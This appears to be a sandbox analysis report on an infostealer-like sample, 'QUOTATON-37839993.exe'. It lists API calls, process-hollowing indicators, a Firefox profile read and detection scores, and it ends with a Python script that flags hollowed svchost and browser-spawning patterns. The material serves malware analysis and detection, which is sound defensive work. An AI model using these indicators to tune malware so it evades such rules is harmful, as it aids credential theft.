                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072FE0 NtCreateFile, 4_2_03072FE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072E30 NtWriteVirtualMemory, 4_2_03072E30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072E80 NtReadVirtualMemory, 4_2_03072E80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072EA0 NtAdjustPrivilegesToken, 4_2_03072EA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072EE0 NtQueueApcThread, 4_2_03072EE0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072D00 NtSetInformationFile, 4_2_03072D00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072D10 NtMapViewOfSection, 4_2_03072D10
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072D30 NtUnmapViewOfSection, 4_2_03072D30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072DB0 NtEnumerateKey, 4_2_03072DB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072DD0 NtDelayExecution, 4_2_03072DD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072C00 NtQueryInformationProcess, 4_2_03072C00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072C60 NtCreateKey, 4_2_03072C60
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072CA0 NtQueryInformationToken, 4_2_03072CA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072CC0 NtQueryVirtualMemory, 4_2_03072CC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03072CF0 NtOpenProcess, 4_2_03072CF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03073010 NtOpenDirectoryObject, 4_2_03073010
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03073090 NtSetValueKey, 4_2_03073090
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_030739B0 NtGetContextThread, 4_2_030739B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03073D10 NtOpenProcessToken, 4_2_03073D10
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 4_2_03073D70 NtOpenThread, 4_2_03073D70
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03764340 NtSetContextThread,LdrInitializeThunk, 13_2_03764340
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03764650 NtSuspendThread,LdrInitializeThunk, 13_2_03764650
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762B60 NtClose,LdrInitializeThunk, 13_2_03762B60
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_03762BF0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762BE0 NtQueryValueKey,LdrInitializeThunk, 13_2_03762BE0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762BA0 NtEnumerateValueKey,LdrInitializeThunk, 13_2_03762BA0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762AF0 NtWriteFile,LdrInitializeThunk, 13_2_03762AF0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762AD0 NtReadFile,LdrInitializeThunk, 13_2_03762AD0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762F30 NtCreateSection,LdrInitializeThunk, 13_2_03762F30
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762FE0 NtCreateFile,LdrInitializeThunk, 13_2_03762FE0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762FB0 NtResumeThread,LdrInitializeThunk, 13_2_03762FB0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762EE0 NtQueueApcThread,LdrInitializeThunk, 13_2_03762EE0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762E80 NtReadVirtualMemory,LdrInitializeThunk, 13_2_03762E80
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762D30 NtUnmapViewOfSection,LdrInitializeThunk, 13_2_03762D30
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762D10 NtMapViewOfSection,LdrInitializeThunk, 13_2_03762D10
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762DF0 NtQuerySystemInformation,LdrInitializeThunk, 13_2_03762DF0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762DD0 NtDelayExecution,LdrInitializeThunk, 13_2_03762DD0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762C70 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_03762C70
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762C60 NtCreateKey,LdrInitializeThunk, 13_2_03762C60
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762CA0 NtQueryInformationToken,LdrInitializeThunk, 13_2_03762CA0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_037635C0 NtCreateMutant,LdrInitializeThunk, 13_2_037635C0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_037639B0 NtGetContextThread,LdrInitializeThunk, 13_2_037639B0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762B80 NtQueryInformationFile, 13_2_03762B80
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762AB0 NtWaitForSingleObject, 13_2_03762AB0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762F60 NtCreateProcessEx, 13_2_03762F60
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762FA0 NtQuerySection, 13_2_03762FA0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762F90 NtProtectVirtualMemory, 13_2_03762F90
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762E30 NtWriteVirtualMemory, 13_2_03762E30
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762EA0 NtAdjustPrivilegesToken, 13_2_03762EA0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762D00 NtSetInformationFile, 13_2_03762D00
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762DB0 NtEnumerateKey, 13_2_03762DB0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762C00 NtQueryInformationProcess, 13_2_03762C00
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762CF0 NtOpenProcess, 13_2_03762CF0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03762CC0 NtQueryVirtualMemory, 13_2_03762CC0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03763010 NtOpenDirectoryObject, 13_2_03763010
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03763090 NtSetValueKey, 13_2_03763090
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03763D70 NtOpenThread, 13_2_03763D70
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_03763D10 NtOpenProcessToken, 13_2_03763D10
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_02E892F0 NtClose, 13_2_02E892F0
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_02E89250 NtDeleteFile, 13_2_02E89250
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_02E89160 NtReadFile, 13_2_02E89160
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_02E89450 NtAllocateVirtualMemory, 13_2_02E89450
                Source: C:\Windows\SysWOW64\comp.exe Code function: 13_2_02E88FF0 NtCreateFile, 13_2_02E88FF0
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe Code function: 0_2_00E6A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00E6A1EF
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe Code function: 0_2_00E58310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00E58310
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exe Code function: 0_2_00E651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00E651BD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03041F924_2_03041F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FFFB14_2_030FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03049EB04_2_03049EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03043D404_2_03043D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F1D5A4_2_030F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030F7D734_2_030F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0305FDC04_2_0305FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030B9C324_2_030B9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_030FFCF24_2_030FFCF2
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03062EBF12_2_03062EBF
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03083AF212_2_03083AF2
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306306212_2_03063062
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03062F1212_2_03062F12
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03064F3212_2_03064F32
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_0306B64212_2_0306B642
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03064D0A12_2_03064D0A
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeCode function: 12_2_03064D1212_2_03064D12
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EA35213_2_037EA352
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373E3F013_2_0373E3F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037F03E613_2_037F03E6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037D027413_2_037D0274
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037B02C013_2_037B02C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037B815813_2_037B8158
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037CA11813_2_037CA118
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0372010013_2_03720100
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E81CC13_2_037E81CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037F01AA13_2_037F01AA
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037C200013_2_037C2000
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373077013_2_03730770
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0375475013_2_03754750
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0372C7C013_2_0372C7C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374C6E013_2_0374C6E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373053513_2_03730535
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037F059113_2_037F0591
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E244613_2_037E2446
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037DE4F613_2_037DE4F6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EAB4013_2_037EAB40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E6BD713_2_037E6BD7
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0372EA8013_2_0372EA80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374696213_2_03746962
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037329A013_2_037329A0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037FA9A613_2_037FA9A6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373A84013_2_0373A840
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373284013_2_03732840
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0375E8F013_2_0375E8F0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037168B813_2_037168B8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037A4F4013_2_037A4F40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03750F3013_2_03750F30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03772F2813_2_03772F28
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373CFE013_2_0373CFE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03722FC813_2_03722FC8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037AEFA013_2_037AEFA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03730E5913_2_03730E59
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EEE2613_2_037EEE26
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EEEDB13_2_037EEEDB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03742E9013_2_03742E90
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037ECE9313_2_037ECE93
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373AD0013_2_0373AD00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0372ADE013_2_0372ADE0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03748DBF13_2_03748DBF
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03730C0013_2_03730C00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03720CF213_2_03720CF2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037D0CB513_2_037D0CB5
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0371D34C13_2_0371D34C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E132D13_2_037E132D
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0377739A13_2_0377739A
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037D12ED13_2_037D12ED
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374B2C013_2_0374B2C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037352A013_2_037352A0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0371F17213_2_0371F172
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037FB16B13_2_037FB16B
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0376516C13_2_0376516C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373B1B013_2_0373B1B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E70E913_2_037E70E9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EF0E013_2_037EF0E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037DF0CC13_2_037DF0CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037370C013_2_037370C0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EF7B013_2_037EF7B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E16CC13_2_037E16CC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E757113_2_037E7571
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037CD5B013_2_037CD5B0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0372146013_2_03721460
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EF43F13_2_037EF43F
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EFB7613_2_037EFB76
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037A5BF013_2_037A5BF0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0376DBF913_2_0376DBF9
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374FB8013_2_0374FB80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037A3A6C13_2_037A3A6C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EFA4913_2_037EFA49
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E7A4613_2_037E7A46
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037DDAC613_2_037DDAC6
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037CDAAC13_2_037CDAAC
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03775AA013_2_03775AA0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0373995013_2_03739950
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374B95013_2_0374B950
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037C591013_2_037C5910
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0379D80013_2_0379D800
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037338E013_2_037338E0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EFF0913_2_037EFF09
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EFFB113_2_037EFFB1
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03731F9213_2_03731F92
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03739EB013_2_03739EB0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E7D7313_2_037E7D73
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037E1D5A13_2_037E1D5A
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_03733D4013_2_03733D40
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0374FDC013_2_0374FDC0
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037A9C3213_2_037A9C32
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_037EFCF213_2_037EFCF2
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E71C0013_2_02E71C00
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E7526013_2_02E75260
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E7346013_2_02E73460
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6CB2813_2_02E6CB28
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6CB3013_2_02E6CB30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E8B91013_2_02E8B910
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6AE8013_2_02E6AE80
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6AE7413_2_02E6AE74
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6CD5013_2_02E6CD50
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_02E6AD3013_2_02E6AD30
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349E6EB13_2_0349E6EB
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349E58313_2_0349E583
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349E46513_2_0349E465
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349E91C13_2_0349E91C
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349D9E813_2_0349D9E8
                Source: C:\Windows\SysWOW64\comp.exeCode function: 13_2_0349CC8313_2_0349CC83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 102 times
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: String function: 00E28900 appears 42 times
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: String function: 00E20AE3 appears 70 times
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: String function: 00E07DE1 appears 35 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 03765130 appears 56 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 0371B970 appears 275 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 0379EA12 appears 86 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 03777E54 appears 100 times
                Source: C:\Windows\SysWOW64\comp.exeCode function: String function: 037AF290 appears 105 times
                Source: QUOTATON-37839993.exe, 00000000.00000003.2177476970.00000000039AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATON-37839993.exe
                Source: QUOTATON-37839993.exe, 00000000.00000003.2177861257.0000000003803000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATON-37839993.exe
                Source: QUOTATON-37839993.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@11/9
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6A06A GetLastError,FormatMessageW,0_2_00E6A06A
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E581CB AdjustTokenPrivileges,CloseHandle,0_2_00E581CB
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00E587E1
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E6B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00E6B3FB
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E7EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00E7EE0D
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E783BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00E783BB
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeCode function: 0_2_00E04E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00E04E89
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeFile created: C:\Users\user\AppData\Local\Temp\aut4700.tmpJump to behavior
                Source: QUOTATON-37839993.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: comp.exe, 0000000D.00000003.2773026171.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4007580490.000000000300F000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000003.2775628464.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, comp.exe, 0000000D.00000002.4007580490.0000000002FE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: QUOTATON-37839993.exeReversingLabs: Detection: 47%
                Source: QUOTATON-37839993.exeVirustotal: Detection: 30%
                Source: unknownProcess created: C:\Users\user\Desktop\QUOTATON-37839993.exe "C:\Users\user\Desktop\QUOTATON-37839993.exe"
                Source: C:\Users\user\Desktop\QUOTATON-37839993.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\QUOTATON-37839993.exe"
                Source: C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exeProcess created: C:\Windows\SysWOW64\comp.exe "C:\Windows\SysWOW64\comp.exe"
                Source: C:\Windows\SysWOW64\comp.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
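The process-creation rows above carry the three signals a detection engineer would key on: a copy of svchost.exe started with the sample's own command line (the image on disk and the command line disagree, the usual footprint of process hollowing), an svchost.exe whose parent is not services.exe, and a browser (firefox.exe) launched by a system utility (comp.exe) rather than by the shell. The following is an added example, not code from Joe Sandbox or from the malware; it runs those three rules over constructed process-creation records that mirror this report's tree (the PIDs, the benign services.exe row and the `ProcEvent` field names are assumptions for the example).

```python
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (field names are assumed for this example)."""
    pid: int
    parent_image: str
    image: str
    cmdline: str


BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
WINDOWS_BIN_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def argv0(cmdline: str) -> str:
    """Return the program token of a Windows command line, quoted or bare."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(None, 1)[0] if s else ""


def is_windows_binary(path: str) -> bool:
    return path.lower().startswith(WINDOWS_BIN_DIRS)


def triage(event: ProcEvent) -> list:
    """Return the list of reasons this event looks hostile (empty if none)."""
    reasons = []
    image = ntpath.basename(event.image).lower()
    parent = ntpath.basename(event.parent_image).lower()
    claimed = ntpath.basename(argv0(event.cmdline)).lower()
    # Rule 1: the image on disk is not the program the command line names.
    if claimed and claimed != image:
        reasons.append(f"image/cmdline mismatch: {image} started as {claimed}")
    # Rule 2: a legitimate svchost.exe is always a child of services.exe.
    if image == "svchost.exe" and parent != "services.exe":
        reasons.append(f"svchost.exe parent is {parent}, not services.exe")
    # Rule 3: users launch browsers from the shell, not from System32 utilities.
    if image in BROWSERS and is_windows_binary(event.parent_image):
        reasons.append(f"browser spawned by system utility {parent}")
    return reasons


def triage_all(events) -> dict:
    """Map pid -> reasons for every event that trips at least one rule."""
    return {e.pid: triage(e) for e in events if triage(e)}


# Constructed sample: the tree from this report plus one benign svchost row.
EVENTS = [
    ProcEvent(1, r"C:\Windows\explorer.exe",
              r"C:\Users\user\Desktop\QUOTATON-37839993.exe",
              r'"C:\Users\user\Desktop\QUOTATON-37839993.exe"'),
    ProcEvent(4, r"C:\Users\user\Desktop\QUOTATON-37839993.exe",
              r"C:\Windows\SysWOW64\svchost.exe",
              r'"C:\Users\user\Desktop\QUOTATON-37839993.exe"'),
    ProcEvent(13, r"C:\Program Files (x86)\EEfvjwkOcTTrJsNQsNlPWOoCOGZrgqvjbWYDuyrfYdYDGeaMmKfMG\FOBNeEFwBsF.exe",
              r"C:\Windows\SysWOW64\comp.exe",
              r'"C:\Windows\SysWOW64\comp.exe"'),
    ProcEvent(15, r"C:\Windows\SysWOW64\comp.exe",
              r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
    ProcEvent(99, r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for pid, reasons in triage_all(EVENTS).items():
        for r in reasons:
            print(f"pid {pid}: {r}")
```

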